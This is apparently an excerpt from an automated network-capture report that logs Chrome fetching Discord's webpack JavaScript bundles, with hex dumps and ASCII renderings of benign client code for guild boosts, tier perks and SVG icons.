                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PR8tshr9UjVkiwvbW3NuaCUWoy3mYYmajVT_M1hNbwY-1702226713054-0-604800000
                                                                          2023-12-10 16:45:13 UTC967INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 30 36 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 31 61 65 66 65 37 34 33 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 18069Connection: closeCF-Ray: 8336f501aefe743c-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC402INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 39 37 34 32 22 5d 2c 7b 35 38 33 33 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 74 29 2c 69 2e 64 28 74 2c 7b 66 65 74 63 68 41 70 70 6c 69 65 64 47 75 69 6c 64 42 6f 6f 73 74 73 46 6f 72 47 75 69 6c 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 66 65 74 63 68 47 75 69 6c 64 42 6f 6f 73 74 53 6c 6f 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 61 70 70 6c 79 54 6f 47 75 69 6c 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["99742"],{583367:function(e,t,i){"use strict";i.r(t),i.d(t,{fetchAppliedGuildBoostsForGuild:function(){return d},fetchGuildBoostSlots:function(){return l},applyToGuild:function(){retur
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 29 2c 73 3d 69 28 22 39 31 33 31 34 34 22 29 2c 6f 3d 69 28 22 34 34 38 39 39 33 22 29 2c 49 3d 69 28 22 37 38 33 31 31 31 22 29 2c 75 3d 69 28 22 35 32 32 33 30 38 22 29 2c 72 3d 69 28 22 35 32 31 30 31 32 22 29 2c 54 3d 69 28 22 34 39 31 31 31 22 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 5f 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 54 2e 45 6e 64 70 6f 69 6e 74 73 2e 41 50 50 4c 49 45 44 5f 47 55 49 4c 44 5f 42 4f 4f 53 54 53 5f 46 4f 52 5f 47 55 49 4c 44 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 69 3d 74 2e 62 6f 64 79 2e 6d 61 70 28 65 3d 3e 49 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 46 72 6f 6d 53 65 72 76 65 72 28 65 29 29 3b 72 65 74 75 72 6e 20
                                                                          Data Ascii: ),s=i("913144"),o=i("448993"),I=i("783111"),u=i("522308"),r=i("521012"),T=i("49111");async function d(e){let t=await _.default.get({url:T.Endpoints.APPLIED_GUILD_BOOSTS_FOR_GUILD(e),oldFormErrors:!0}),i=t.body.map(e=>I.default.createFromServer(e));return
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 73 74 45 72 72 6f 72 28 74 29 3b 74 68 72 6f 77 20 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 55 4e 41 50 50 4c 59 5f 42 4f 4f 53 54 5f 46 41 49 4c 22 2c 65 72 72 6f 72 3a 65 7d 29 2c 65 7d 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 55 4e 41 50 50 4c 59 5f 42 4f 4f 53 54 5f 53 55 43 43 45 53 53 22 2c 62 6f 6f 73 74 49 64 3a 74 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 5f 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 54 2e 45 6e 64 70 6f 69 6e 74 73 2e 55 53 45 52 5f 47 55 49 4c 44 5f 42 4f 4f 53 54 5f 53 4c 4f 54 5f 43 41 4e 43 45 4c 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f
                                                                          Data Ascii: stError(t);throw s.default.dispatch({type:"GUILD_UNAPPLY_BOOST_FAIL",error:e}),e}s.default.dispatch({type:"GUILD_UNAPPLY_BOOST_SUCCESS",boostId:t})}async function a(e){let t=await _.default.post({url:T.Endpoints.USER_GUILD_BOOST_SLOT_CANCEL(e),oldFormErro
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6c 65 74 20 49 3d 21 31 2c 75 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 6c 65 74 7b 67 75 69 6c 64 42 6f 6f 73 74 53 6c 6f 74 3a 74 7d 3d 65 3b 75 3d 7b 2e 2e 2e 75 2c 5b 74 2e 69 64 5d 3a 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 6c 65 74 20 65 3d 7b 7d 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 75 29 29 65 5b 74 2e 69 64 5d 3d 74 2c 74 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 53 75 62 73 63 72 69 70 74 69 6f 6e 42 79 49 64 28 74 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 49 64 29 3b 75 3d 65 7d 63 6c 61 73 73 20 64 20 65 78 74 65 6e 64 73 20 5f 2e 64 65 66 61 75 6c 74 2e 53 74 6f 72 65 7b 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 74 68 69 73 2e 73 79 6e 63 57 69
                                                                          Data Ascii: let I=!1,u={};function r(e){let{guildBoostSlot:t}=e;u={...u,[t.id]:t}}function T(){let e={};for(let t of Object.values(u))e[t.id]=t,t.subscription=o.default.getSubscriptionById(t.subscriptionId);u=e}class d extends _.default.Store{initialize(){this.syncWi
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6e 20 63 7d 2c 67 65 74 54 6f 74 61 6c 53 6f 75 6e 64 62 6f 61 72 64 53 6f 75 6e 64 43 6f 75 6e 74 46 6f 72 54 69 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 7d 2c 67 65 74 49 6e 63 72 65 6d 65 6e 74 61 6c 53 6f 75 6e 64 62 6f 61 72 64 53 6f 75 6e 64 43 6f 75 6e 74 46 6f 72 54 69 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 7d 2c 67 65 74 54 69 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 2c 67 65 74 54 69 65 72 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 50 7d 2c 67 65 74 53 68 6f 72 74 65 6e 65 64 54 69 65 72 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 7d 2c 6d 69 6e 69 6d 75 6d 52 65 71 75 69 72 65 64 54 69 65 72 46 6f 72 47 75 69
                                                                          Data Ascii: n c},getTotalSoundboardSoundCountForTier:function(){return L},getIncrementalSoundboardSoundCountForTier:function(){return D},getTiers:function(){return N},getTierName:function(){return P},getShortenedTierName:function(){return O},minimumRequiredTierForGui
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 7d 29 2c 28 73 3d 5f 7c 7c 28 5f 3d 7b 7d 29 29 5b 73 2e 45 4d 4f 4a 49 3d 31 5d 3d 22 45 4d 4f 4a 49 22 2c 73 5b 73 2e 41 55 44 49 4f 3d 32 5d 3d 22 41 55 44 49 4f 22 2c 73 5b 73 2e 41 4e 49 4d 41 54 45 44 3d 33 5d 3d 22 41 4e 49 4d 41 54 45 44 22 2c 73 5b 73 2e 43 55 53 54 4f 4d 49 5a 41 54 49 4f 4e 3d 34 5d 3d 22 43 55 53 54 4f 4d 49 5a 41 54 49 4f 4e 22 2c 73 5b 73 2e 55 50 4c 4f 41 44 3d 35 5d 3d 22 55 50 4c 4f 41 44 22 2c 73 5b 73 2e 56 41 4e 49 54 59 3d 36 5d 3d 22 56 41 4e 49 54 59 22 2c 73 5b 73 2e 53 54 52 45 41 4d 3d 37 5d 3d 22 53 54 52 45 41 4d 22 2c 73 5b 73 2e 53 54 49 43 4b 45 52 3d 38 5d 3d 22 53 54 49 43 4b 45 52 22 2c 73 5b 73 2e 43 55 53 54 4f 4d 5f 52 4f 4c 45 5f 49 43 4f 4e 3d 31 31 5d 3d 22 43 55 53 54 4f 4d 5f 52 4f 4c 45 5f 49 43
                                                                          Data Ascii: }),(s=_||(_={}))[s.EMOJI=1]="EMOJI",s[s.AUDIO=2]="AUDIO",s[s.ANIMATED=3]="ANIMATED",s[s.CUSTOMIZATION=4]="CUSTOMIZATION",s[s.UPLOAD=5]="UPLOAD",s[s.VANITY=6]="VANITY",s[s.STREAM=7]="STREAM",s[s.STICKER=8]="STICKER",s[s.CUSTOM_ROLE_ICON=11]="CUSTOM_ROLE_IC
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 45 52 4b 5f 44 45 53 43 52 49 50 54 49 4f 4e 5f 54 49 45 52 5f 31 5f 45 4d 4f 4a 49 2c 69 63 6f 6e 3a 31 7d 2c 7b 74 69 74 6c 65 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f 50 52 45 4d 49 55 4d 5f 50 45 52 4b 5f 54 49 54 4c 45 5f 54 49 45 52 5f 41 4e 59 5f 53 54 49 43 4b 45 52 2e 66 6f 72 6d 61 74 28 7b 61 64 64 69 6e 67 3a 63 28 53 2e 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 73 2e 54 49 45 52 5f 31 29 2c 74 6f 74 61 6c 3a 66 28 53 2e 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 73 2e 54 49 45 52 5f 31 29 7d 29 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f
                                                                          Data Ascii: ERK_DESCRIPTION_TIER_1_EMOJI,icon:1},{title:G.default.Messages.GUILD_SETTINGS_GUILD_PREMIUM_PERK_TITLE_TIER_ANY_STICKER.format({adding:c(S.BoostedGuildTiers.TIER_1),total:f(S.BoostedGuildTiers.TIER_1)}),description:G.default.Messages.GUILD_SETTINGS_GUILD_
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 53 5f 47 55 49 4c 44 5f 50 52 45 4d 49 55 4d 5f 50 45 52 4b 5f 44 45 53 43 52 49 50 54 49 4f 4e 5f 54 49 45 52 5f 31 5f 53 54 52 45 41 4d 49 4e 47 2c 69 63 6f 6e 3a 37 7d 5d 2e 66 69 6c 74 65 72 28 6e 2e 69 73 4e 6f 74 4e 75 6c 6c 69 73 68 29 7d 2c 7b 74 69 65 72 3a 53 2e 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 73 2e 54 49 45 52 5f 32 2c 74 69 74 6c 65 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f 50 52 45 4d 49 55 4d 5f 50 45 52 4b 53 5f 54 49 54 4c 45 5f 54 49 45 52 5f 32 2c 70 65 72 6b 73 3a 5b 7b 74 69 74 6c 65 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f 50 52 45 4d 49 55 4d 5f 50 45 52 4b
                                                                          Data Ascii: S_GUILD_PREMIUM_PERK_DESCRIPTION_TIER_1_STREAMING,icon:7}].filter(n.isNotNullish)},{tier:S.BoostedGuildTiers.TIER_2,title:G.default.Messages.GUILD_SETTINGS_GUILD_PREMIUM_PERKS_TITLE_TIER_2,perks:[{title:G.default.Messages.GUILD_SETTINGS_GUILD_PREMIUM_PERK
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 49 4f 4e 5f 54 49 45 52 5f 32 5f 41 55 44 49 4f 5f 51 55 41 4c 49 54 59 2c 69 63 6f 6e 3a 32 7d 2c 7b 74 69 74 6c 65 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f 50 52 45 4d 49 55 4d 5f 50 45 52 4b 5f 54 49 54 4c 45 5f 54 49 45 52 5f 32 5f 42 41 4e 4e 45 52 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f 50 52 45 4d 49 55 4d 5f 50 45 52 4b 5f 44 45 53 43 52 49 50 54 49 4f 4e 5f 54 49 45 52 5f 32 5f 42 41 4e 4e 45 52 2c 69 63 6f 6e 3a 34 7d 2c 7b 74 69 74 6c 65 3a 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55
                                                                          Data Ascii: ION_TIER_2_AUDIO_QUALITY,icon:2},{title:G.default.Messages.GUILD_SETTINGS_GUILD_PREMIUM_PERK_TITLE_TIER_2_BANNER,description:G.default.Messages.GUILD_SETTINGS_GUILD_PREMIUM_PERK_DESCRIPTION_TIER_2_BANNER,icon:4},{title:G.default.Messages.GUILD_SETTINGS_GU


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          273192.168.2.550008162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/18407.d0257553d76c1da19de7.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
                                                                          2023-12-10 16:45:14 UTC1124INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 32 36 38 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 32 64 61 31 34 36 64 63 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:14 GMTContent-Type: application/javascriptContent-Length: 62685Connection: closeCF-Ray: 8336f502da146dc1-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:14 UTC245INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 38 34 30 37 22 5d 2c 7b 34 34 34 37 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6c 29 2c 74 2e 64 28 6c 2c 7b 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 73 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 61 3d 74 28 22 33 37 39 38 33 22 29 3b 74 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 6e 3d 74 28 22 36 36 39 34 39 31 22 29 2c 73 3d 74 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 72 3d 65 3d 3e 7b 6c 65 74
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18407"],{444791:function(e,l,t){"use strict";t.r(l),t.d(l,{AnnouncementsIcon:function(){return r}});var a=t("37983");t("884691");var n=t("669491"),s=t("75196");let r=e=>{let
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 7b 77 69 64 74 68 3a 6c 3d 32 34 2c 68 65 69 67 68 74 3a 74 3d 32 34 2c 63 6f 6c 6f 72 3a 72 3d 6e 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 69 3d 22 22 2c 2e 2e 2e 63 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 63 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 74 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73
                                                                          Data Ascii: {width:l=24,height:t=24,color:r=n.default.colors.INTERACTIVE_NORMAL,colorClass:i="",...c}=e;return(0,a.jsxs)("svg",{...(0,s.default)(c),xmlns:"http://www.w3.org/2000/svg",width:l,height:t,fill:"none",viewBox:"0 0 24 24",children:[(0,a.jsx)("path",{fill:"s
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 31 20 30 20 30 20 31 2d 31 20 31 68 2d 36 61 31 20 31 20 30 20 30 20 31 2d 31 2d 31 56 35 61 31 20 31 20 30 20 30 20 31 20 31 2d 31 5a 6d 34 2d 2e 35 56 34 68 2d 32 76 2d 2e 35 61 31 20 31 20 30 20 31 20 31 20 32 20 30 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 7d 29 2c 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 3f 72 3a 72 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 32 2e 33 33 20 35 2e 37 34 61 2e 35 2e 35 20 30 20 30 20 31 20 2e 36 37 2e 34 37 56 39 61 33 20 33 20 30 20 30 20 30 20 33 20 33 68 35 2e 35 63 2e 32 38 20 30 20 2e 35 2e 32 32 2e 35 2e 35 76 38 63 30 20 2e 38 33 2d
                                                                          Data Ascii: 1 0 0 1-1 1h-6a1 1 0 0 1-1-1V5a1 1 0 0 1 1-1Zm4-.5V4h-2v-.5a1 1 0 1 1 2 0Z",clipRule:"evenodd",className:i}),(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,fillRule:"evenodd",d:"M12.33 5.74a.5.5 0 0 1 .67.47V9a3 3 0 0 0 3 3h5.5c.28 0 .5.22.5.5v8c0 .83-
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 30 63 2d 2e 31 36 2e 30 33 2d 2e 33 32 2d 2e 30 37 2d 2e 33 33 2d 2e 32 33 6c 2d 2e 32 31 2d 32 2e 30 32 61 2e 35 2e 35 20 30 20 30 20 31 20 2e 35 2d 2e 35 35 5a 4d 31 39 20 39 61 31 20 31 20 30 20 31 20 30 20 30 2d 32 20 31 20 31 20 30 20 30 20 30 20 30 20 32 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 7d 29 2c 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 3f 72 3a 72 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 32 2e 34 33 20 35 2e 37 61 2e 35 2e 35 20 30 20 30 20 31 20 2e 36 2e 37 32 6c 2d 2e 36 33 20 31 2e 31 63 2d 31 2e 32 32 20 32 2e 31 33 2e 34 36 20 34 2e 34 38 20 32 2e 36 34
                                                                          Data Ascii: 0c-.16.03-.32-.07-.33-.23l-.21-2.02a.5.5 0 0 1 .5-.55ZM19 9a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z",clipRule:"evenodd",className:i}),(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,fillRule:"evenodd",d:"M12.43 5.7a.5.5 0 0 1 .6.72l-.63 1.1c-1.22 2.13.46 4.48 2.64
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 20 30 2d 32 2e 34 35 2d 32 2e 33 35 20 37 2e 36 38 20 37 2e 36 38 20 30 20 30 20 30 2d 33 2e 36 31 2d 2e 38 33 63 2d 31 2e 35 35 20 30 2d 32 2e 39 36 2e 33 37 2d 34 2e 32 32 20 31 2e 31 61 37 2e 36 36 20 37 2e 36 36 20 30 20 30 20 30 2d 32 2e 39 36 20 33 2e 30 37 20 39 2e 35 33 20 39 2e 35 33 20 30 20 30 20 30 2d 31 2e 30 39 20 34 2e 36 36 63 30 20 31 2e 34 35 2e 32 36 20 32 2e 37 37 2e 37 38 20 33 2e 39 35 61 36 2e 33 20 36 2e 33 20 30 20 30 20 30 20 32 2e 34 37 20 32 2e 38 31 20 38 2e 33 20 38 2e 33 20 30 20 30 20 30 20 34 2e 33 36 20 31 2e 30 35 20 31 32 2e 34 33 20 31 32 2e 34 33 20 30 20 30 20 30 20 35 2e 33 35 2d 31 2e 31 38 2e 35 2e 35 20 30 20 30 20 31 20 2e 37 2e 32 34 6c 2e 34 36 20 31 2e 30 37 63 2e 31 2e 32 32 2e 30 32 2e 34 37 2d 2e 31 39 2e
                                                                          Data Ascii: 0-2.45-2.35 7.68 7.68 0 0 0-3.61-.83c-1.55 0-2.96.37-4.22 1.1a7.66 7.66 0 0 0-2.96 3.07 9.53 9.53 0 0 0-1.09 4.66c0 1.45.26 2.77.78 3.95a6.3 6.3 0 0 0 2.47 2.81 8.3 8.3 0 0 0 4.36 1.05 12.43 12.43 0 0 0 5.35-1.18.5.5 0 0 1 .7.24l.46 1.07c.1.22.02.47-.19.
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 74 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 3f 72 3a 72 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 35 20 32 61 33 20 33 20 30 20 30 20 31 20 33 20 33 76 31 32 48 35 2e 35 61 31 2e 35 20 31 2e 35 20 30 20 30 20 30 20 30 20 33 68 31 34 61 2e 35 2e 35 20 30 20 30 20 30 20 2e 35 2d 2e 35 56 35 68 31 61 31 20 31 20 30 20 30 20 31 20 31 20 31 76 31 35 61 31 20 31 20 30 20
                                                                          Data Ascii: lns:"http://www.w3.org/2000/svg",width:l,height:t,fill:"none",viewBox:"0 0 24 24",children:(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,fillRule:"evenodd",d:"M15 2a3 3 0 0 1 3 3v12H5.5a1.5 1.5 0 0 0 0 3h14a.5.5 0 0 0 .5-.5V5h1a1 1 0 0 1 1 1v15a1 1 0
